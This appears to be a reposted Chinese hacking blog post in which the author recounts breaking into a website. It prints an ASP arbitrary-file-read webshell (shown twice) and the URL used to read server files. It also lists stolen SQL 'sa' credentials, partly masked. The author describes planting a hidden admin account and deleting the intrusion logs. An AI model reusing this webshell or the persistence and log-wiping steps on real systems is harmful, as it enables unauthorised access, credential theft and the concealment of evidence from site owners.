我是如何突破一流检测系统的 's

admin 2017年4月3日05:38:21评论329 views字数 709阅读2分21秒阅读模式
摘要

作者: laoguier
来源: http://www.hackbase.com攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
-------------------------------------------------------------------------

<%
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
myfile.close
Set myfile=nothing
else
Response.write "file(" & file & ") not exists."
end if
%>
-------------------------------------------------------------------------

作者: laoguier
来源: http://www.hackbase.com

攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
-------------------------------------------------------------------------

<%
file=Request("file")
Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject")
if FSOOBJ.fileExists(file) then
Set myfile=FSOOBJ.opentextfile(file,1)
Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>"
myfile.close
Set myfile=nothing
else
Response.write "file(" & file & ") not exists."
end if
%>
-------------------------------------------------------------------------

http://www.***.com/view.asp?file=D:/wwwroot/index.asp

读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f

利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月3日05:38:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   我是如何突破一流检测系统的 'shttps://cn-sec.com/archives/48216.html

发表评论

匿名网友 填写信息